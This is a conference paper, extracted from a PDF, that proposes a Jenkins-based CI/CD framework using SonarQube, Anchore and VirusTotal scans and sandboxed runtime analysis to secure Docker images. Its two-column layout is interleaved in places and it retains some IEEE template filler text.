See discussions, stats, and author profiles for this publication at: https://www.researchgate.
net/publication/354029818
Framework to Secure Docker Containers
Conference Paper · July 2021
DOI: 10.1109/WorldS451998.2021.9514041
CITATIONS READS
15 1,370
2 authors, including:
Manish Abhishek
Indian Railways
13 PUBLICATIONS 63 CITATIONS
SEE PROFILE
All content following this page was uploaded by Manish Abhishek on 18 October 2021.
The user has requested enhancement of the downloaded file.
Framework to Secure Docker Containers
1st Manish Kumar Abhishek 2nd D. Rajeswara Rao
Department of CSE Department of CSE
Koneru Lakshmaiah Education Foundation Koneru Lakshmaiah Education Foundation
Vaddeswaram, India Vaddeswaram, India
manish.abhishek@gov.in rajeshpitam@gmail.com
Abstract—Docker is one the key component for application Docker commands need to be executed to achieve all these
deployment using CI/CD pipelines. Wherever containers are tasks and Docker file is going to be used to bundle all the
going ot be used, Docker engine is always the first choice but required dependencies, libraries. For software deployment
on other hand security of the Docker images using which using Docker, the development community has been created
application is going to be deployed is always a concern. In the Docker hub that is used for persist the Docker images as
cloud computing, validation of the Docker images security is a a repository. Now a day for software deployment features are
paramount. Containers virtualization which is based on spitted in terms of micro services to achieve the code
operating system virtualization is not secure as hypervisor reusability and independent deployment via containers.
virtualization. In this paper we are proposing a framework
Every container is going to represent one individual process
which uses an architecture including plugins, CI/CD pipeline to
deploy the application to ensure the security of application
holding its own process id during its execution. It is
bundled as a Docker image. It is going to be referred from the recommended to have one container per micro service
starting of application development till the deployment holding individual or set of feature/module.
including plugin for Docker build, bundling the application in This requirement of using containers to bundle the
form of images along with required libraries, pushing the application in form of Docker image is raising a security
images to Docker registry. Jenkin jobs are going to be used for concern for its distribution. Software architects are also
getting the build and then for deployment. For validation, we
encouraging the inclusion of risk analysis which considers
came up with vulnerable Docker images and validated against
the distribution pipeline as malicious one. In this paper, the
our architecture having proposed model to compare the
results. In later sections, we have also considered the
proposed framework is based on the multi-layer security
containers security measures. architecture including the private registry to push the images
to address the vulnerabilities. For application deployment, it
Keywords— Containers, Continuous Integration (CI), is based on several stages wrapped as a Jenkin job in terms
Continuous Deployment (CD), Docker, Jenkin, Virtualization of CI/CD pipeline to evaluate the bundled Docker images
that is pushed later in Docker hub which is eliminating the
I. INTRODUCTION push and continuous reuse of vulnerable Docker images.
In today’s containerization world, the application Images selection along with malicious content has been also
development and deployment using CI/CD pipeline in one of analysed and evaluated via using the CI/CD pipeline to
the common requirements that everyone is looking at. figure out the abnormal execution environment followed by
Containers are very light weight in nature as they are totally security standards and practices with containers
based on Operating System (OS) virtualization and do not considerations. The remaining sections in this paper have
need the whole configuration for its dependent binaries. They been represented in following manner: Section 2 is
have been significantly adopted for the whole software describing the background details of security analysis and
lifecycle from deployment to development phases including concerns with respect to Docker images. Section 3 is all
upgrades, fix packs and much more. They are in trend an about the proposed framework model using which the whole
making a buzz in entire IT world. Containers have been architecture has been defined. Section 4 is describing the
considered a suitable choice even for High performance evaluation methodology, results and the related work.
computing applications via adopting their dynamic allocation Conclusion is provided in Section 5.
at the infrastructure level in cloud computing [1]. Instead of
II. SECURITY ANALYSIS
having virtual machines using hypervisor, containers have
been given more weightage to make the environment It is difficult to move the whole monolith application to
scalable and suitable for failover use cases. It executes on container in comparison to micro services. With monolith
isolated layer of operating system to avoid the overhead. application, scalability and code reusability is always a
They are very portable in nature in comparison to virtual concern as with software lifecycle, the whole application
machines which are basically using the whole individual grows and it’s difficult to maintain the legacy code over a
operating system including its own libraries, binaries as an time of period. The application running on physical server to
individual underlying layer of hardware layer via hypervisor. a Docker Container, it requires the identification of all the
This is one of the major reasons behind the adoption of elementary components. Figure 1 shows the abstracted
containers in virtualization world. architecture for Docker containers. With MVC architecture,
every layer is divided into containers. For example, database
Docker is an open source platform to facilitate layer will be in one container, web app in another and need a
applications in packages none other than containers. It separate for component holding the business logic along with
consist multiple light weighted containers. Docker consists its server. It has been analysed and found that file or
several modules which allows to bundle the application in executions examination is one of the forms of malware
form of image along with its dependencies, tagging of analysis to find out the probable cause of security
images, uploading and downloading of images to/from compromises. It is mainly categorized into two parts with
Docker hub or private registry, their execution and even
persisting the running state in terms of updates to use later.
XXX-X-XXXX-XXXX-X/XX/$XX.00 ©20XX IEEE
respect to images. One of them is static where second one is B. Dynamic
at run time or can be called as behavioural analysis. It is applicable after application development and
referring the container’s behaviour. This analysis includes
containers monitoring including ports scan, consumption of
resources in terms of CPU, memory, registry keep tracking,
network activity and firewall rules monitoring. As it is
related to containers and performed at execution level, results
can be more impactful. Even dynamic allocation of
computing resources with respect to containers always helps
us for their monitoring [4]. Docker engine is going to handle
and take care of containers provisioning where each
container is well defined with its own computing resources
[5] and not going to impact other containers. Every container
is going to hold its own unique process id. Containers can
impact the host if it is going to be executed by the admin or
root privileges. On other hand if multiple containers are
executed by the same user, they can also impact each other.
If every container is going to have its own network bridge
with respect to host physical network, single container can
consume the whole network and result into network denial of
service attack. One of the major issues is to trust the Docker
image downloaded from the Docker hub that is available
publicly for all [6].
III. PROPOSED DESIGN
Here, we are describing the designed framework
architecture to address the analysed security issue or
vulnerabilities via scanning the images and third-party jars
regularly fitted inside a model. CI/CD pipeline has been
created to track the whole workflow from development to
deployment. Using this proposed architecture of our
framework, it will minimize the cost as well as security
analyses fix faster and transient to user. Figure 2 shows the
proposed architecture to secure Docker containers.
Fig. 1: Docker containers high level architecture.
A. Continuous Integration (CI) Pipeline
Continuous Integration pipeline is going to be
A. Static responsible for building the Docker image and pushing it to
During static kind of analysis, the data has been private registry followed by multiple stages itself in pipeline.
examined prior to its execution. It is holding a set of Once the code changes have been pushed to the code base
predefined actions. CVE system is one the example [2]. In repository, this pipeline will start. First stage of pipeline will
past, software vulnerabilities were often computed by be checking out the code changes implemented by developer,
scoring metrics. Multiple scoring metrics were computed to and then it is going to compile it followed by running test
find out the vulnerability. The third-party jars used as a part cases in case of any and generate the SonarQube report. This
of software development were also getting considered from report is now be the static analysis to figure out the code
security issues. Common Vulnerabilities and Exposures smells, bugs, security vulnerabilities. This report is having
(CVE) system is used against the inconsistent results to find the details of code coverage, new code changes code
out the security issues and vulnerabilities. CVE is internally coverage, issues, measures of reliability, security,
providing the framework to share these details publicly [3]. maintainability and other application details. Issues type will
The most common option to find out the security issues is be bugs, vulnerability, code smells and security hotspot
using the CVE system to scan the Docker images regularly having the unsafe arguments details. Using this report having
which will be easily addressed before application the details of static analysis of application code, we can
deployment. Appropriate actions can be taken against these easily address the security vulnerabilities even before
vulnerabilities. SonarQube is another example which is creation of our Docker image. Once issues have been
going to continuous examines the code quality. It will help to addressed, we can go ahead with later stages of pipeline i.e.
find out the unreachable code, memory leak, boundary value Docker build, Image Tagging, Pushing the images to registry
violations, code smells, and vulnerabilities, bugs categorized and updated the image versions for build track. Instead of
in form of blocker, critical, major and minor. Static analysis using the public registry, every organization can have a
is also helpful to find out the malicious files based on hashes, private registry to keep images of their application which
signatures and extension of file. It is mainly going to will make it more secure.
analyses the security issues at application development level
and before its deployment.
evaluating our proposed architecture for determining the
security vulnerabilities and hotspots related to Docker
containers including both static as well as dynamic resources
allocation, usage of free computing resources for application,
performance, profiling, and queue throughput. Table 1 shows
the details of Docker images and its version details. We have
used the PostgreSQL server for persistency as a database,
CentOS 7 as operating system, AdoptOpenJDK 11 for
application development basically maven build, Docker
version 18.09.7, Nginx 1.10.3 and Jenkin Server with
2.164.1 as a version.
TABLE I. DOCKER IMAGES AND THEIR VERSION USED FOR
EVALUATION
Images Version
CentOS 7.0
PostgreSQL 12.0
Docker 18.09.07
AdoptOpenJDK 11
Nginx 1.10.3
Jenkin 2.164.1
Fig. 2: Proposed model to secure Docker containers.
B. Continuous Deployment (CD) Pipeline
Continuous deployment pipeline is going to be
responsible for the deployment of application build i.e. the
result of CI pipeline. In the first stage of this pipeline, it will Fig. 3: SonarQube report details.
first check the registry details, download the latest version
image automatically and extract the archived images. In next Figure 3 shows the sonar report that has been generated
stage, it is going to deploy it. If already exists, will do during CI pipeline as one of the stages to find out the
uninstall/upgrade accordingly. Here we have also introduced security hotspots and vulnerabilities. Even before checking
our own automated API which will take care of identifying the code, one round of examine has been done by developers
the security issues with Docker images. If we use public using local server for analysis. For our application, we
Docker registry, this API will help us to find out the issues. It addressed mostly issue at development time only but still
is mainly going to execute that image to find out the traffic, found 2 security hotspots and 1 vulnerability due to the usage
network changes, firewall rules and other security scans of old jars. For CD pipeline, we have deployed our
before deploying it to production environment. It is a kind of application having REST Server where API has been
staging environment execution that will help us to find out exposed as an API gateway using Nginx. Swagger
the issues in labs only before releasing it for usage and documentation is provided to invoke the REST APIs
deployment. We have analysed and found that mostly the respective to modules. As an infra we have deployed the
images which include the bash scripts responsible to create PostgreSQL which is more secure. For CentOS images, we
the secure shell (SSH) tunnels during container execution are have the defined rule which will make sure that after having
the malicious one. These images tend to download the non- a count of below than 16 minor vulnerabilities use, the
defined binaries and installing the shell code. To address this quality gate will be marked as true and we are good to use
issue, we are proposing a small service which will examine this image. As a result of our quality gate, we found that
the Docker image and removed thee kind of binaries. We PostgreSQL image is secure and Nginx using our application
have used sandbox in one of our cloud services to provide has been passed even with 120 as a total count of security
the isolation. vulnerabilities as they were not falling into category of
IV. EVALUATION AND RESULTS critical and blocker. SonarQube repost has been also passed
even after having 90 minor issues. Docker file has been
After the text edit has been completed, the paper is ready analysed using the Achore Engine’s security policy.
for the template. Duplicate the template file by using the PostgreSQL image has cleared all the analysis and found
Save As command, and use the naming convention suitable to push to our private registry. For Nginx based
prescribed by your conference for the name of your paper. In application we were unable to push image as found
this newly created file, highlight all of the Here, we are vulnerable checks for it.
We have also used the VirusTotal as an antivirus engine AWS resources. Valance [8] also demonstrated the same
to scan the images and found the malicious content. Figure 4 with the help of Anchore Engine to perform security analysis
shows the scanning results performed on Docker images to on Docker images. We observed a limitation with their
find out the malicious content. One of the root causes was process i.e. the manual provisioning of AWS services and an
found that whenever we are using the old version of few jars. inability to define custom security policies. With Valance’s
Wherever possible always try to use latest stable version of approach there is a lack of source which really initiates the
third-party jars. Third party jars need to be upgraded whole CI/CD pipeline. If we compare these with our
regularly per release. Figure shows the results performed proposed framework, it will be comparable that proposed
using VirusTotal i.e. antivirus engine. As CentOS, Java, architecture is automated, scalable and simplify the complex
Nginx and node images are default supported by Docker workflows of application release/upgrades and flexible in
registry but available publically, they have been scanned nature.
before pushing into our private registry. The application
images including all dependencies/libraries found malicious V. CONCLUSION
mainly due to start pod, probe scripts and old jars. For application development and deployment, Docker
containers are the best choice but on another hand, these are
vulnerable and lacks of appropriate tools are effectively
quantifying the risk. Major tools are either needs enterprise
license or time consuming. On the top that there is always a
risk as they are using third party jars. Our proposed
framework can be easily adopted in any organization as its
core architecture to find out the bugs, security hotspots,
vulnerabilities before pushing the Docker images to registry
and also scanning the images to avoid the issues at runtime.
Malicious images will always try to download and execute
the non-defined dependencies and can be vulnerable. With
our static and dynamic analysis approach, developers can
easily examine the security defects and push non-malicious
Fig. 4: Docker image scan results for malicious content. Docker images. The complete automated flow is ensuring the
security concerns without any manual interventions.
ACKNOWLEDGMENT (Heading 5)
A special thanks to the Koneru Lakshmaiah Education
Foundation for facilitating me required infrastructure and my
guide helpful nature as well as other staff members who
helped me to accomplish this research work.
REFERENCES
Fig. 5: Dynamic analysis for Docker images at run time. [1] Abhishek, Manish. (2020). Containerization for shipping Scientific
Workloads in Cloud. International Journal of Advanced Trends in
Figure 5 shows the results of dynamic analysis API Computer Science and Engineering. 9. 5327.
including the process executions, file updates followed by 25 10.30534/ijatcse/2020/166942020.
seconds of runtime. File system is getting modified with [2] P. Mell, K. Scarfone, and S. Romanosky, “The Common
respect to the image functionality and performed actions. We Vulnerability Scoring System (CVSS) and Its Applicability to Federal
Agency Systems,” National Institute of Standards and Technology,
have examined the system and computing resources, for Tech. Rep. Interagency Report 7435, August 2007.
example CPU metadata. We found the major issue once [3] Abhishek, Manish. (2020). Dynamic Allocation of High-Performance
images started the SSH daemon. For network traffic we have Computing Resources. International Journal of Advanced Trends in
uploaded a pcap during image execution that found abnormal Computer Science and Engineering. 9. 3538-3543.
in nature. The observed finding was around DNS request and 10.30534/ijatcse/2020/159932020.
found the image as malicious one as it was trying to attempt [4] R. A. Martin, "Managing vulnerabilities in networked systems," in
cryptocurrency. Computer, vol. 34, no. 11, pp. 32-38, Nov. 2001, doi:
10.1109/2.963441.
A. Related Work [5] Abhishek, Manish. (2020). High Performance Computing using
Containers in Cloud. International Journal of Advanced Trends in
For CVEs, there are multiple tools that can be used. For Computer Science and Engineering. 9. 5686.
example: OpenSCAP6. It examines and based on data 10.30534/ijatcse/2020/220942020.
available as per the National Vulnerability Database7 [6] D. Goodin, “Backdoored images downloaded 5 million times finally
determines the security vulnerabilities and policies removed from Docker Hub,”
violations. To scan the Docker images, generally oscap- [https://arstechnica.com/informationtechnology/ 2018/06/backdoored-
Docker tool can be used. Many tools are open source and can images-downloaded-5-million-timesfinally- removed-from-Docker-
hub/, June 2018].
be easily integrated with CI/CD pipeline for static and
[7] V. Adethyaa and T. Jernigan, “Scanning Docker Images for
dynamic analysis. Even Docker itself officially offers trusted Vulnerabilities using Clair, Amazon ECS, ECR, and AWS
registries for security scan as per CVE database but we need CodePipeline,” AWS Compute Blog,
to pay for that. CI/CD pipeline is helpful in case of Docker November2018[https://aws.amazon.com/blogs/compute/scanning-
containers security checks. Adethyaa and Jernigan [7] Docker-images-forvulnerabilities- using-clair-amazon-ecs-ecr-aws-
demoed a CI/CD pipeline for Docker images which uses codepipeline/.].
[8] J. Valance, “Using Anchore Policies to Help Achieve the CIS Docker [13] D. Huang, H. Cui, S. Wen and C. Huang, "Security Analysis and
Benchmark,” Anchore Blog, May 2019, Threats Detection Techniques on Docker Container," 2019 IEEE 5th
[https://anchore.com/cisDocker- benchmark/] International Conference on Computer and Communications (ICCC),
[9] K. Brady, S. Moon, T. Nguyen and J. Coffman, "Docker Container Chengdu, China,2019, pp. 1214-1220, doi:
Security in Cloud Computing," 2020 10th Annual Computing and 10.1109/ICCC47050.2019.9064441.
Communication Workshop and Conference (CCWC), Las Vegas, NV, [14] A. R. Manu, J. K. Patel, S. Akhtar, V. K. Agrawal and K. N. B.
USA, 2020, pp. 0975-0980, doi: Subramanya Murthy, "A study, analysis and deep dive on cloud
10.1109/CCWC47524.2020.9031195. PAAS security in terms of Docker container security," 2016
[10] J. Blackthorne, A. Bulazel, A. Fasano, P. Biernat, and B. Yener, International Conference on Circuit, Power and Computing
“AVLeak: Fingerprinting Antivirus Emulators through Black-Box Technologies (ICCPCT), Nagercoil, 2016, pp. 1-13, doi:
Testing,” in 10th USENIX Workshop on Offensive Technologies. 10.1109/ICCPCT.2016.7530284.
Austin, TX: USENIX Association, Aug. 2016. [15] 15. P. P. W. Pathirathna, V. A. I. Ayesha, W. A. T. Imihira, W. M.
[11] V. Rastogi, C. Niddodi, S. Mohan, and S. Jha, “New directions for J. C. Wasala, N. Kodagoda and E. A. T. D. Edirisinghe, "Security
container debloating,” in Proceedings of the 2017 Workshop on testing as a service with Docker containerization," 2017 11th
Forming an Ecosystem Around Software Transformation, ser. FEAST International Conference on Software, Knowledge, Information
’17. New York, NY, USA: ACM, November 2017. Management and Applications (SKIMA), Malabe, 2017, pp. 1-7, doi:
10.1109/SKIMA.2017.8294109.
[12] Mullinix, Samuel & Konomi, Erikton & Townsend, Renee & Parizi,
Reza. (2020). On Security Measures for Containerized Applications
Imaged with Docker.
View publication stats